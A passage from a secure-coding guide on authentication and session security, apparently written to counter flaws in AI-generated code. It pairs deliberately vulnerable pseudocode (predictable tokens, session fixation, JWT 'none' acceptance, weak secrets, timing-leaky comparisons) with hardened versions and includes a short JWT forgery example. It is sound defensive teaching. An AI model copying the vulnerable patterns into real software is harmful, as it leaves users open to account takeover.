{{ user_html | sanitize }}
+ +// Handlebars +
{{sanitize user_html}}
+ +// EJS +
<%= sanitize(user_html) %>
+``` + +--- + +## Security Checklist + +- [ ] All user input rendered in HTML is HTML-encoded +- [ ] All user input in HTML attributes is attribute-encoded and quoted +- [ ] All user input in JavaScript strings is JavaScript-encoded +- [ ] All user input in URLs is URL-encoded (and scheme validated for links) +- [ ] All user input in CSS is CSS-encoded or allowlist-validated +- [ ] `innerHTML`, `document.write`, and similar are avoided or use sanitized input +- [ ] `textContent` is used instead of `innerHTML` where possible +- [ ] `dangerouslySetInnerHTML`, `v-html`, `|safe` etc. are only used with sanitized content +- [ ] URL schemes are validated (allow only http/https, not javascript:) +- [ ] Server-side encoding/sanitization is implemented (not just client-side) +- [ ] Encoding is performed at output time, specific to each context +- [ ] HTML sanitizer (DOMPurify) is used when rich HTML input is required +- [ ] Content Security Policy (CSP) headers are implemented +- [ ] `X-Content-Type-Options: nosniff` is set (the legacy `X-XSS-Protection` header is deprecated in modern browsers; rely on CSP instead) +- [ ] Cookie HttpOnly flag is set to prevent JavaScript access +- [ ] No user input reaches eval(), new Function(), or setTimeout/setInterval called with string arguments +- [ ] Framework auto-escaping is enabled and not bypassed + +--- + +# Pattern 4: Authentication and Session Security + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute) + +**Priority Score:** 22 (Frequency: 8, Severity: 9, Detectability: 5) + +--- + +## Introduction: High Complexity Leads to High AI Error Rate + +Authentication and session management are among the most complex security domains in application development. 
AI models struggle particularly with these patterns for several interconnected reasons: + +**Why AI Models Generate Insecure Authentication Code:** + +1. **Complexity Breeds Shortcuts:** Authentication requires coordinating multiple components—password storage, session management, token generation, cookie handling, and logout procedures. AI models often generate "working" code that skips essential security layers for simplicity. + +2. **Tutorial Syndrome:** Training data is saturated with simplified authentication tutorials designed to teach concepts, not build production systems. These tutorials often omit rate limiting, secure token generation, proper session invalidation, and timing attack prevention. + +3. **JWT Misunderstandings:** JSON Web Tokens have become the default recommendation, but AI models frequently generate JWT implementations with critical flaws—the "none" algorithm vulnerability, weak secrets, improper validation, and insecure storage. + +4. **Framework Diversity:** Authentication patterns vary dramatically across frameworks (Passport.js, Spring Security, Django, Rails Devise, etc.). AI models conflate patterns between frameworks, generating hybrid code that's neither correct for any framework nor secure. + +5. **Stateless vs. Stateful Confusion:** The shift toward stateless authentication (JWTs) has created mixed patterns in training data. AI often combines stateless token concepts with stateful session assumptions, creating logical gaps in security. + +6. **Edge Case Blindness:** Authentication edge cases—concurrent sessions, password reset flows, account recovery, MFA, and OAuth state management—require deep security thinking that AI models cannot reliably produce. 
+ +**Impact Statistics:** + +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk State of AI Security Survey 2024) +- **63%** of data breaches involve weak, default, or stolen credentials (Verizon DBIR 2024) +- Authentication bypasses represent **41%** of critical vulnerabilities in web applications (HackerOne Report) +- Average cost of a credential-stuffing breach: **$4.3 million** (Ponemon Institute) +- Only **23%** of AI-generated authentication code properly implements session invalidation on logout + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: Weak Password Validation + +```pseudocode +// VULNERABLE: Minimal password requirements +function validatePassword(password): + if length(password) < 6: + return false + return true + +// VULNERABLE: Only checks length, no complexity +function registerUser(email, password): + if length(password) >= 8: // "Strong enough" + hashedPassword = hashPassword(password) + createUser(email, hashedPassword) + return success + return error("Password too short") + +// VULNERABLE: Pattern allows easy-to-guess passwords +function isValidPassword(password): + // Only requires one of each - easily satisfied by "Password1!" 
+ hasUpper = containsUppercase(password) + hasLower = containsLowercase(password) + hasNumber = containsNumber(password) + hasSpecial = containsSpecialChar(password) + + if hasUpper and hasLower and hasNumber and hasSpecial: + return true + return false + // Missing: dictionary check, common password check, breach check +``` + +**Why This Is Dangerous:** +- Allows passwords like "123456", "password", or "qwerty123" +- No protection against common password lists +- No check against known breached passwords (Have I Been Pwned) +- Pattern requirements are easily satisfied by predictable passwords ("Password1!") +- Attackers can crack weak passwords in seconds with modern hardware + +--- + +### BAD Example 2: Predictable Session Tokens + +```pseudocode +// VULNERABLE: Sequential session IDs +sessionCounter = 1000 + +function generateSessionId(): + sessionCounter = sessionCounter + 1 + return "session_" + toString(sessionCounter) + +// VULNERABLE: Time-based session generation +function createSessionToken(): + timestamp = getCurrentTimestamp() + return "sess_" + toString(timestamp) + +// VULNERABLE: Weak random source +function generateToken(): + return "token_" + toString(randomInteger(0, 999999)) + +// VULNERABLE: MD5 of predictable data +function createAuthToken(userId): + timestamp = getCurrentTimestamp() + return md5(toString(userId) + toString(timestamp)) + +// VULNERABLE: User-controlled seed +function generateSessionId(userId, email): + seed = userId + email + getCurrentDate() + return sha256(seed) // Deterministic - same inputs = same output +``` + +**Why This Is Dangerous:** +- Sequential IDs allow session enumeration—attacker can guess valid sessions +- Timestamp-based tokens can be predicted if attacker knows approximate creation time +- Weak random (Math.random, random.randint) is predictable with statistical analysis +- MD5 is fast to compute, enabling brute-force attacks +- User-controlled inputs in token generation allow attackers to predict tokens + 
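The contrast between a predictable generator and a cryptographically secure one can be sketched in Python. This is a minimal illustration, assuming the standard-library `secrets` module; the function names `predictable_session_id`, `generate_session_id`, and `session_ids_match` are hypothetical and do not come from the skill itself.

```python
import secrets
import time
from typing import Optional


def predictable_session_id(now: Optional[float] = None) -> str:
    """Anti-pattern: the token depends only on the clock, so it is guessable."""
    timestamp = int(now if now is not None else time.time())
    return f"sess_{timestamp}"


def generate_session_id(num_bytes: int = 32) -> str:
    """Return a hex session ID drawn from the OS CSPRNG (256 bits by default)."""
    return secrets.token_hex(num_bytes)


def session_ids_match(presented: str, stored: str) -> bool:
    """Compare two IDs in constant time so timing does not leak a prefix match."""
    return secrets.compare_digest(presented, stored)
```

An attacker who knows roughly when a session was created can enumerate every candidate value of the first function, while the second offers no structure to enumerate. The constant-time comparison is an extra precaution for code that compares tokens directly rather than looking them up by key.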
+--- + +### BAD Example 3: Session Fixation Vulnerabilities + +```pseudocode +// VULNERABLE: Session ID not regenerated after login +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if user and verifyPassword(password, user.hashedPassword): + // Using the SAME session ID from before authentication + request.session.userId = user.id + request.session.authenticated = true + return redirect("/dashboard") + return error("Invalid credentials") + +// VULNERABLE: Accepting session ID from URL parameter +function handleRequest(request): + sessionId = request.query.sessionId or request.cookies.sessionId + // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session + session = loadSession(sessionId) + +// VULNERABLE: Not invalidating session on privilege change +function promoteToAdmin(request): + user = getCurrentUser(request) + user.role = "admin" + user.save() + // Same session continues - if session was compromised before, + // attacker now has admin access + return success("You are now an admin") +``` + +**Why This Is Dangerous:** +- Attacker sets session ID → victim logs in → attacker uses same session ID with victim's authenticated session +- URL-based session IDs can be logged in server logs, browser history, referrer headers +- Privilege escalation without session regeneration means compromised sessions gain elevated access + +--- + +### BAD Example 4: JWT "none" Algorithm Acceptance + +```pseudocode +// VULNERABLE: Decoding JWT without algorithm verification +function verifyJwt(token): + parts = token.split(".") + header = base64Decode(parts[0]) + payload = base64Decode(parts[1]) + + // Trusting the algorithm from the token header itself! + algorithm = header.alg + + if algorithm == "none": + return payload // No signature check! 
+ + signature = parts[2] + if verifySignature(payload, signature, algorithm): + return payload + return null + +// VULNERABLE: Using jwt library without specifying expected algorithm +function validateToken(token): + try: + // Library may accept 'none' algorithm if token specifies it + decoded = jwt.decode(token, secretKey) + return decoded + catch: + return null + +// VULNERABLE: Allowing multiple algorithms including none +function verifyToken(token, secret): + options = { + algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS + } + return jwt.verify(token, secret, options) +``` + +**Why This Is Dangerous:** +- Attacker modifies JWT header to specify `alg: "none"` and removes signature +- Server accepts unsigned token as valid +- This vulnerability has affected major JWT libraries across multiple languages +- Complete authentication bypass—attacker can impersonate any user + +**Exploit Example:** +```pseudocode +// Original legitimate token: +// Header: {"alg":"HS256","typ":"JWT"} +// Payload: {"sub":"1234","role":"user"} +// Signature: valid_signature_here + +// Attacker-modified token: +// Header: {"alg":"none","typ":"JWT"} ← Changed to "none" +// Payload: {"sub":"1234","role":"admin"} ← Changed to admin +// Signature: (empty) ← Removed + +// If server trusts header.alg, this forged token is accepted as valid +``` + +--- + +### BAD Example 5: Weak JWT Secrets + +```pseudocode +// VULNERABLE: Short/guessable secret +JWT_SECRET = "secret" + +// VULNERABLE: Common secrets from tutorials +JWT_SECRET = "your-256-bit-secret" +JWT_SECRET = "supersecretkey" +JWT_SECRET = "jwt-secret-key" + +// VULNERABLE: Empty or null secret +function createToken(payload): + secret = getConfig("JWT_SECRET") or "" // Falls back to empty string + return jwt.sign(payload, secret, {algorithm: "HS256"}) + +// VULNERABLE: Secret derived from predictable data +function getJwtSecret(): + return sha256(APPLICATION_NAME + "-" + ENVIRONMENT) + // If attacker knows app name and 
environment, they can derive the secret + +// VULNERABLE: Same secret for signing and encryption +JWT_SECRET = "shared_secret_for_everything" +function signToken(payload): + return jwt.sign(payload, JWT_SECRET) +function encryptData(data): + return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability +``` + +**Why This Is Dangerous:** +- Weak secrets can be brute-forced or found in wordlists +- Common tutorial secrets are in public databases of JWT secrets +- Empty secrets may be accepted by some JWT libraries +- Secret compromise allows forging any JWT—complete authentication bypass +- Key reuse across different cryptographic operations violates security principles + +--- + +### BAD Example 6: Token Storage in localStorage + +```pseudocode +// VULNERABLE: Storing JWT in localStorage +function handleLoginResponse(response): + accessToken = response.data.accessToken + refreshToken = response.data.refreshToken + + // localStorage is accessible to ANY JavaScript on the page + localStorage.setItem("access_token", accessToken) + localStorage.setItem("refresh_token", refreshToken) + + // Also stored user data in localStorage + localStorage.setItem("user", JSON.stringify(response.data.user)) + +// VULNERABLE: Retrieving token for API calls +function apiRequest(endpoint, data): + token = localStorage.getItem("access_token") + return fetch(endpoint, { + headers: { + "Authorization": "Bearer " + token + }, + body: JSON.stringify(data) + }) + +// VULNERABLE: Token in sessionStorage (same problem) +function storeToken(token): + sessionStorage.setItem("jwt", token) +``` + +**Why This Is Dangerous:** +- localStorage is accessible to any JavaScript running on the page +- XSS vulnerability = complete authentication compromise +- Tokens persist across browser sessions (localStorage) +- No protection against browser extensions reading storage +- Refresh tokens in localStorage allow long-term account takeover + +--- + +### BAD Example 7: Missing Token Expiration + +```pseudocode 
+// VULNERABLE: JWT without expiration +function createUserToken(user): + payload = { + userId: user.id, + email: user.email, + role: user.role + // No "exp" claim! + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Extremely long expiration +function generateToken(user): + payload = { + sub: user.id, + iat: now(), + exp: now() + (365 * 24 * 60 * 60) // 1 year expiration + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Trusting token-provided expiration without server check +function validateToken(token): + decoded = jwt.verify(token, JWT_SECRET) + // JWT library checks exp, but server has no session to revoke + // Compromised tokens valid until natural expiration + return decoded + +// VULNERABLE: No mechanism to invalidate tokens +function logout(request): + response.clearCookie("token") + return success("Logged out") + // Token is still valid! Anyone with the token can still use it +``` + +**Why This Is Dangerous:** +- Tokens without expiration are valid forever if secret isn't changed +- Long-lived tokens give attackers extended exploitation windows +- No server-side invalidation means compromised tokens can't be revoked +- Logout only removes token from client but doesn't invalidate it +- Stolen tokens remain valid even after password change + +--- + +## GOOD Examples: Secure Authentication Patterns + +### GOOD Example 1: Strong Password Requirements Pattern + +```pseudocode +// SECURE: Comprehensive password validation +import commonPasswordList from "common-passwords-database" +import breachedPasswordApi from "haveibeenpwned-api" + +function validatePasswordStrength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many orgs use 12+) + if length(password) < 12: + errors.push("Password must be at least 12 characters") + + // Maximum length (prevent DoS from hashing extremely long passwords) + if length(password) > 128: + errors.push("Password cannot exceed 128 characters") + + // Check against common password list 
(10,000+ passwords) + if password.toLowerCase() in commonPasswordList: + errors.push("This password is too common") + + // Check against user-specific data (optional but recommended) + // - Don't allow email prefix as password + // - Don't allow username as password + + // Check against breached passwords (Have I Been Pwned API) + if await checkBreachedPassword(password): + errors.push("This password has appeared in a data breach") + + if length(errors) > 0: + return { valid: false, errors: errors } + + return { valid: true, errors: [] } + +// SECURE: Check breached passwords using k-anonymity (no password exposure) +async function checkBreachedPassword(password): + // Hash password with SHA-1 (HIBP API requirement) + hash = sha1(password).toUpperCase() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send the first 5 hex characters of the hash - k-anonymity preserves privacy + response = await fetch("https://api.pwnedpasswords.com/range/" + prefix) + hashes = await response.text() // text() is asynchronous; await the body + + // Check if our suffix appears in the returned hashes (format: SUFFIX:COUNT) + for line in hashes.split("\n"): + parts = line.split(":") + if parts[0] == suffix: + return true // Password has been breached + + return false + +// SECURE: Password hashing with proper algorithm +function hashPassword(password): + // bcrypt with cost factor of 12 (adjust based on hardware) + // Note: bcrypt only uses the first 72 bytes of input, so characters beyond that do not add strength + // Alternatively: argon2id with recommended parameters (no such input limit) + return bcrypt.hash(password, 12) + +function verifyPassword(password, hash): + return bcrypt.compare(password, hash) +``` + +**Why This Is Secure:** +- Length requirements block trivially short passwords +- Common password checking rejects the passwords that dictionary attacks try first +- Breach checking rejects passwords already circulating in credential-stuffing lists +- k-anonymity ensures that only a 5-character hash prefix, never the password, leaves the server +- bcrypt/argon2 provide slow, salted password hashing with a tunable work factor + +--- + +### GOOD Example 2: Secure Session Generation + +```pseudocode +// SECURE: Cryptographically random session IDs +import 
cryptoRandom from "secure-random-library" + +function generateSessionId(): + // 256 bits of cryptographically secure randomness + // Represented as 64 hex characters + randomBytes = cryptoRandom.getRandomBytes(32) + return bytesToHex(randomBytes) + +// SECURE: Session creation with proper attributes +function createSession(userId): + sessionId = generateSessionId() + + sessionData = { + id: sessionId, + userId: userId, + createdAt: now(), + expiresAt: now() + SESSION_DURATION, // e.g., 24 hours + lastActivityAt: now(), + ipAddress: getClientIP(), + userAgent: getUserAgent() + } + + // Store in server-side session store (Redis, database, etc.) + sessionStore.save(sessionId, sessionData) + + return sessionId + +// SECURE: Session ID regeneration after authentication +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if not user: + return error("Invalid credentials") // Don't reveal if email exists + + if not verifyPassword(password, user.hashedPassword): + recordFailedLogin(user.id, getClientIP()) + return error("Invalid credentials") + + // CRITICAL: Destroy old session and create new one + if request.session.id: + sessionStore.delete(request.session.id) + + // Generate completely new session ID after authentication + newSessionId = createSession(user.id) + + // Set session cookie with secure attributes + response.setCookie("session_id", newSessionId, { + httpOnly: true, // Prevent XSS access + secure: true, // HTTPS only + sameSite: "Strict", // CSRF protection + path: "/", + maxAge: SESSION_DURATION + }) + + return redirect("/dashboard") + +// SECURE: Session regeneration on privilege change +function changeUserRole(request, newRole): + user = getCurrentUser(request) + + // Change the role + user.role = newRole + user.save() + + // Regenerate session to bind new privileges to fresh session + oldSessionId = request.cookies.session_id + sessionStore.delete(oldSessionId) + + newSessionId = 
createSession(user.id) + + response.setCookie("session_id", newSessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + + return success("Role updated") +``` + +**Why This Is Secure:** +- Cryptographically random session IDs prevent prediction/enumeration +- Session regeneration after login prevents session fixation +- Privilege changes trigger session regeneration +- Secure cookie attributes prevent common attack vectors +- Server-side session storage allows proper invalidation + +--- + +### GOOD Example 3: Proper JWT Validation + +```pseudocode +// SECURE: JWT configuration with strict settings +JWT_CONFIG = { + secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment + algorithms: ["HS256"], // Single allowed algorithm - explicit! + issuer: "myapp.example.com", + audience: "myapp-users", + expiresIn: "15m" // Short-lived access tokens +} + +// SECURE: Token creation with explicit claims +function createAccessToken(user): + payload = { + sub: toString(user.id), + email: user.email, + role: user.role, + iss: JWT_CONFIG.issuer, + aud: JWT_CONFIG.audience, + iat: now(), + exp: now() + (15 * 60), // 15 minutes + jti: generateUUID() // Unique token ID for revocation + } + + return jwt.sign(payload, JWT_CONFIG.secret, { + algorithm: "HS256" // Explicit algorithm + }) + +// SECURE: Token verification with all claims checked +function verifyAccessToken(token): + try: + decoded = jwt.verify(token, JWT_CONFIG.secret, { + algorithms: ["HS256"], // ONLY accept HS256 + issuer: JWT_CONFIG.issuer, + audience: JWT_CONFIG.audience, + complete: true // Return header + payload + }) + + // Additional validation + if not decoded.payload.sub: + return { valid: false, error: "Missing subject" } + + if not decoded.payload.role: + return { valid: false, error: "Missing role" } + + // Check against token blacklist (for logout/revocation) + if await isTokenRevoked(decoded.payload.jti): + return { valid: false, error: "Token revoked" } + + return { valid: true, 
payload: decoded.payload } + + catch JwtExpiredError: + return { valid: false, error: "Token expired" } + catch JwtInvalidError as e: + return { valid: false, error: "Invalid token: " + e.message } + +// SECURE: Refresh token handling +function createRefreshToken(user, sessionId): + payload = { + sub: toString(user.id), + sid: sessionId, // Bind to session for revocation + type: "refresh", + iat: now(), + exp: now() + (7 * 24 * 60 * 60) // 7 days + } + + // Independent secret (JWT_REFRESH_SECRET is an assumed variable name). + // Appending a suffix to the access secret would not make it a separate key. + token = jwt.sign(payload, getEnv("JWT_REFRESH_SECRET"), { + algorithm: "HS256" + }) + + // Store refresh token hash in database for revocation + tokenHash = sha256(token) + storeRefreshToken(user.id, sessionId, tokenHash, payload.exp) + + return token + +// SECURE: Refresh flow with rotation +function refreshAccessToken(refreshToken): + try: + decoded = jwt.verify(refreshToken, getEnv("JWT_REFRESH_SECRET"), { + algorithms: ["HS256"] + }) + + // Reject any other token type presented as a refresh token + if decoded.type != "refresh": + return { error: "Invalid refresh token" } + + // Verify refresh token is still valid in database + tokenHash = sha256(refreshToken) + storedToken = getRefreshToken(decoded.sub, tokenHash) + + if not storedToken or storedToken.revoked: + return { error: "Refresh token invalid or revoked" } + + // Rotate refresh token (issue new one, revoke old) + revokeRefreshToken(tokenHash) + + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + + catch: + return { error: "Invalid refresh token" } +``` + +**Why This Is Secure:** +- Explicit algorithm specification prevents algorithm confusion attacks +- Short-lived access tokens minimize exposure window +- JTI (JWT ID) enables token revocation +- Refresh token rotation limits reuse attacks +- Complete claim validation (iss, aud, exp, sub) +- Independent secrets for access and refresh tokens, so one token type cannot be replayed as the other + +--- + +### GOOD Example 4: HttpOnly Secure Cookie Usage + +```pseudocode +// SECURE: Cookie-based session with proper attributes 
+function setSessionCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, // Cannot be accessed via JavaScript + secure: true, // Only sent over HTTPS + sameSite: "Strict", // Not sent with cross-site requests + path: "/", // Available for all paths + // Domain omitted on purpose: a host-only cookie is not sent to subdomains. + // Setting domain: ".myapp.com" would share the session with every subdomain. + maxAge: 24 * 60 * 60 // 24 hours in seconds + }) + +// SECURE: JWT in cookie (not localStorage) +function setAuthCookies(response, accessToken, refreshToken): + // Access token - short lived, same-site strict + response.setCookie("access_token", accessToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 15 * 60 // 15 minutes + }) + + // Refresh token - limited path to reduce exposure + response.setCookie("refresh_token", refreshToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", // Only sent to refresh endpoint + maxAge: 7 * 24 * 60 * 60 // 7 days + }) + +// SECURE: Cookie cleanup on logout +function clearAuthCookies(response): + // Set cookies with immediate expiration + response.setCookie("access_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 0 // Immediate expiration + }) + + response.setCookie("refresh_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", + maxAge: 0 + }) + +// SECURE: SameSite considerations for cross-origin needs +function setCookieForOAuth(response, stateToken): + // OAuth requires cookies to work across redirects + // Use Lax instead of Strict when necessary + response.setCookie("oauth_state", stateToken, { + httpOnly: true, + secure: true, + sameSite: "Lax", // Allows top-level navigation + path: "/auth/callback", + maxAge: 10 * 60 // 10 minutes for OAuth flow + }) +``` + +**Why This Is Secure:** +- HttpOnly prevents injected scripts from reading the token cookies +- Secure flag ensures HTTPS-only transmission +- SameSite keeps the cookies off cross-site requests, which mitigates CSRF +- Path 
restriction limits which requests include the cookie +- Short maxAge limits exposure window +- Proper domain scoping prevents subdomain attacks + +--- + +### GOOD Example 5: Token Refresh Patterns + +```pseudocode +// SECURE: Complete token refresh implementation +class AuthenticationService: + + ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes + REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days + REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period + + function login(email, password): + user = validateCredentials(email, password) + if not user: + return { error: "Invalid credentials" } + + // Create session for tracking + session = createSession(user.id) + + // Generate token pair + accessToken = createAccessToken(user) + refreshToken = createRefreshToken(user, session.id) + + return { + accessToken: accessToken, + refreshToken: refreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function refresh(refreshToken): + // Validate refresh token + decoded = verifyRefreshToken(refreshToken) + if not decoded.valid: + return { error: decoded.error } + + // Check token in database + tokenRecord = getRefreshTokenRecord(decoded.jti) + + if not tokenRecord: + // Token doesn't exist - possible theft, invalidate session + invalidateSessionTokens(decoded.sid) + return { error: "Invalid refresh token" } + + if tokenRecord.revoked: + // Reuse of revoked token - likely theft + // Revoke ALL tokens for this session + invalidateSessionTokens(decoded.sid) + logSecurityEvent("Refresh token reuse detected", decoded.sub) + return { error: "Security violation detected" } + + if tokenRecord.usedAt: + // Token was already used - check if within grace period + if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW: + // Outside grace period - potential theft + invalidateSessionTokens(decoded.sid) + return { error: "Refresh token already used" } + // Within grace period - return same tokens (replay protection) + return tokenRecord.lastIssuedTokens + + // Mark token as used + 
tokenRecord.usedAt = now() + tokenRecord.save() + + // Generate new token pair (rotation) + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + // Store new tokens for replay protection + tokenRecord.lastIssuedTokens = { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + tokenRecord.save() + + // Revoke old refresh token (after grace period, it's invalid) + scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function logout(accessToken, refreshToken): + // Revoke access token (add to blacklist until expiry) + decoded = decodeToken(accessToken) + if decoded: + blacklistToken(decoded.jti, decoded.exp) + + // Revoke refresh token immediately + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + revokeRefreshToken(refreshDecoded.jti) + + // Optionally invalidate entire session + if refreshDecoded and refreshDecoded.sid: + invalidateSession(refreshDecoded.sid) + + return { success: true } + + function logoutAll(userId): + // Invalidate all sessions for user (password change, security concern) + sessions = getSessionsForUser(userId) + for session in sessions: + invalidateSessionTokens(session.id) + deleteSession(session.id) + + return { success: true, sessionsInvalidated: length(sessions) } +``` + +**Why This Is Secure:** +- Refresh token rotation limits reuse attacks +- Token reuse detection identifies potential theft +- Grace period prevents legitimate concurrent request issues +- Complete logout invalidates tokens server-side +- Session binding allows "logout from all devices" + +--- + +### GOOD Example 6: Proper Logout (Token Invalidation) + +```pseudocode +// SECURE: Complete logout implementation +function logout(request): + // Get current session/tokens + accessToken = request.cookies.access_token + refreshToken = 
request.cookies.refresh_token + sessionId = request.session.id + + // Revoke access token (add to blacklist) + if accessToken: + decoded = decodeToken(accessToken) + if decoded: + // Add to Redis/cache blacklist with TTL matching token expiry + blacklistToken(decoded.jti, decoded.exp - now()) + + // Revoke refresh token in database + if refreshToken: + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + markRefreshTokenRevoked(refreshDecoded.jti) + + // Delete server-side session + if sessionId: + sessionStore.delete(sessionId) + + // Clear client cookies + response = new Response() + clearAuthCookies(response) + + return response.redirect("/login") + +// SECURE: Token blacklist with automatic expiry +class TokenBlacklist: + // Use Redis or similar with TTL support + + function add(tokenId, ttlSeconds): + redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked") + + function isBlacklisted(tokenId): + return redis.exists("blacklist:" + tokenId) + +// SECURE: Middleware to check token validity +function authMiddleware(request, next): + accessToken = request.cookies.access_token + + if not accessToken: + return redirect("/login") + + decoded = verifyAccessToken(accessToken) + + if not decoded.valid: + return redirect("/login") + + // Check blacklist + if tokenBlacklist.isBlacklisted(decoded.payload.jti): + return redirect("/login") + + // Token is valid and not revoked + request.user = decoded.payload + return next(request) + +// SECURE: Logout from all sessions +function logoutAllSessions(request): + userId = request.user.sub + + // Get all active sessions for user + sessions = sessionStore.findByUserId(userId) + + // Revoke all refresh tokens + refreshTokens = getRefreshTokensForUser(userId) + for token in refreshTokens: + markRefreshTokenRevoked(token.jti) + + // Delete all sessions + for session in sessions: + sessionStore.delete(session.id) + + // Add all user's recent access tokens to blacklist + // This requires tracking issued tokens or using 
short expiry + invalidateAllAccessTokensForUser(userId) + + return success("Logged out from all devices") +``` + +**Why This Is Secure:** +- Server-side revocation makes logout effective immediately +- Blacklist prevents continued use of revoked tokens +- Automatic TTL cleanup prevents blacklist bloat +- "Logout from all devices" handles session compromise +- Cookie clearing removes client-side references + +--- + +## Edge Cases Section + +### Edge Case 1: Race Conditions in Authentication + +```pseudocode +// VULNERABLE: Race condition in login attempts +function login(email, password): + user = findUserByEmail(email) + failedAttempts = getFailedAttempts(email) + + if failedAttempts >= MAX_ATTEMPTS: + return error("Account locked") + + // Race condition: two requests check simultaneously, + // both see failedAttempts = 4, both proceed + if not verifyPassword(password, user.hashedPassword): + incrementFailedAttempts(email) // Not atomic! + return error("Invalid credentials") + + resetFailedAttempts(email) + return success() + +// SECURE: Atomic rate limiting +function loginWithAtomicRateLimit(email, password): + // Atomic increment and check in single operation + result = redis.eval(` + local attempts = redis.call('INCR', KEYS[1]) + if attempts == 1 then + redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window + end + return attempts + `, ["login_attempts:" + email]) + + if result > MAX_ATTEMPTS: + return error("Too many attempts. 
Try again later.") + + user = findUserByEmail(email) + if not user or not verifyPassword(password, user.hashedPassword): + return error("Invalid credentials") + + // Reset on success + redis.del("login_attempts:" + email) + return success() + +// VULNERABLE: Race condition in concurrent session check +function login(email, password, request): + user = authenticate(email, password) + + activeSessions = countActiveSessions(user.id) + if activeSessions >= MAX_SESSIONS: + return error("Too many active sessions") + + // Race: two logins pass the check simultaneously + createSession(user.id) // Now user has MAX_SESSIONS + 1 + return success() + +// SECURE: Use database constraints or atomic operations +function loginWithSessionLimit(email, password, request): + user = authenticate(email, password) + + // Use transaction with row lock + transaction.start() + try: + activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE + if activeSessions >= MAX_SESSIONS: + transaction.rollback() + return error("Too many sessions") + + createSession(user.id) + transaction.commit() + return success() + catch: + transaction.rollback() + throw +``` + +--- + +### Edge Case 2: Timing Attacks on Password Comparison + +```pseudocode +// VULNERABLE: Early return reveals password length information +function verifyPassword_vulnerable(input, stored): + if length(input) != length(stored): + return false // Fast return reveals length mismatch + + for i in range(length(input)): + if input[i] != stored[i]: + return false // Fast return reveals first different character + + return true + +// VULNERABLE: String comparison has timing differences +function checkPassword_vulnerable(password, hash): + computedHash = sha256(password) + return computedHash == hash // == operator may short-circuit + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + // Fold any length mismatch into the result; padding alone would treat "abc" and "abc\0" as equal + result = length(a) ^ length(b) + n = max(length(a), length(b)) 
+ a = a + repeat("\0", n - length(a)) + b = b + repeat("\0", n - length(b)) + + for i in range(n): + result = result | (charCode(a[i]) ^ charCode(b[i])) + + return result == 0 + +// SECURE: Use library-provided constant-time comparison +function verifyPassword_secure(password, hashedPassword): + // bcrypt.compare is designed to be constant-time + return bcrypt.compare(password, hashedPassword) + +// SECURE: Use crypto library's timingSafeEqual +function verifyHash(input, expected): + inputHash = sha256(input) + return crypto.timingSafeEqual( + Buffer.from(inputHash, 'hex'), + Buffer.from(expected, 'hex') + ) +``` + +--- + +### Edge Case 3: Password Reset Token Issues + +```pseudocode +// VULNERABLE: Predictable reset token +function createResetToken_vulnerable(userId): + token = md5(toString(userId) + toString(now())) + expiry = now() + (60 * 60) // 1 hour + saveResetToken(userId, token, expiry) + return token + +// VULNERABLE: Token doesn't expire on use +function resetPassword_vulnerable(token, newPassword): + resetRecord = getResetToken(token) + if resetRecord and resetRecord.expiry > now(): + user = findUserById(resetRecord.userId) + user.hashedPassword = hashPassword(newPassword) + user.save() + // Token not invalidated! Can be reused + return success() + return error("Invalid token") + +// VULNERABLE: Token not invalidated on password change +function changePassword(userId, oldPassword, newPassword): + user = findUserById(userId) + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + // Existing reset tokens still valid! 
